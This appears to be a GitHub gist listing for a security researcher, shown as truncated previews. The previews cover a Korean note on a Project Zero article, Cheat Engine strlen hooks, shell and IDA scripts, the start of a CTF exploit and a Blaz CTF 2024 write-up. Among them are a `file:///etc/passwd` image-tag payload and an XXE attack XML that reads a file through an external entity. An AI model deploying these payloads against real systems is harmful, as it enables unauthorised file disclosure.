번역 Project Zero: Searching statically-linked vulnerable library functions in executable code
취약한 라이브러리가 static link (정적 링크)된 유사한 파일들을 binary 레벨에서 탐지하기가 어렵다
이 글에선 바이너리 파일을 정적으로 분석하여 취약한 오픈 소스 라이브러리 를 탐지하는 결과를 나타내고 있다.
Sihoon Lee push0ebp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <img src="file:///etc/passwd"> |
push0ebp
/ strlen_hook.cea
Last active
March 1, 2024 10:55
cheat engine strlen hooker in auto assembler with calling lua function
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ENABLE] | |
| loadlibrary(luaclient-i386.dll) | |
| luacall(openLuaServer('CELUASERVER')) | |
| globalalloc(luainit, 128) | |
| globalalloc(LuaFunctionCall, 128) | |
| label(luainit_exit) | |
| globalalloc(luaserverinitialized, 4) | |
| globalalloc(luaservername, 12) | |
| luaservername: |
push0ebp
/ strlen_hook_reference.cea
Created
September 25, 2017 13:13
Cheat Engine hook strlen with calling lua function BY REFERENCE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ENABLE] | |
| //code from here to '[DISABLE]' will be used to enable the cheat | |
| {$lua} | |
| function hook(caller ,p1) | |
| print(getNameFromAddress(caller),readString(p1)) | |
| end | |
| {$asm} | |
| loadlibrary(luaclient-i386.dll) |
push0ebp
/ attack.xml
Created
May 31, 2018 10:40
— forked from janmartenjongerius/attack.xml
XXE attack using PHP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE scan [ | |
| <!ENTITY test SYSTEM "target.xml"> | |
| ]><scan>&test;</scan> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| source ~/.antigen.zsh | |
| antigen use oh-my-zsh | |
| antigen theme tjkirch | |
| antigen bundle zsh-users/zsh-autosuggestions | |
| antigen bundle zsh-users/zsh-syntax-highlighting | |
| antigen bundle djui/alias-tips | |
| antigen bundle srijanshetty/zsh-pip-completion | |
| antigen bundle zdharma/history-search-multi-word | |
| antigen bundle autojump |
push0ebp
/ search_statically_linked_vulnerable_library_functions_in_executable_code.md
Last active
July 21, 2019 01:56
Searching statically-linked vulnerable library functions in executable code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import struct | |
| start = here() | |
| end = start + 0x10000 | |
| addr = start | |
| while addr < end: | |
| #if len(list(XrefsFrom(addr, 0))) and get_item_size(addr) <= 8: | |
| #if get_item_size(addr) <= 8: | |
| try: | |
| s = '' | |
| for saddr in range(addr, addr+0x100, 2): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from base58 import * | |
| context.bits = 64 | |
| REMOTE = int(bool(args.REMOTE)) | |
| encoded_user_pk = args.USER_PK | |
| user_pk = b58decode(encoded_user_pk.encode()) | |
| target_pda_pk = b58decode(b'Ei3Ny8gV2uEtFKL8XzLMkQN5t3Rzhdy9apaAJxAoNAHT') | |
| my_program_id = b58decode(b'osecio1111111111111111111111111111111111111') |
push0ebp
/ blaz-ctf-2024-write-up.md
Created
September 29, 2024 18:36
[Write-up] Blaz CTF 2024 - I Love REVMC
This challenge provides the source code of the JIT compiler using revmc, along with patches for the revm and anvil source code from foundry.
The goal is to read a flag string stored at memory address 0x13370000.
Below is the source code of the libjit.so that gets loaded when JIT is executed in anvil. The load_flag() function is executed when the library is loaded.
// https://github.com/fuzzland/blazctf-2024/blob/main/i-love-revmc/challenge/anvil-image/jit-compiler/c/linker.c#L54-L69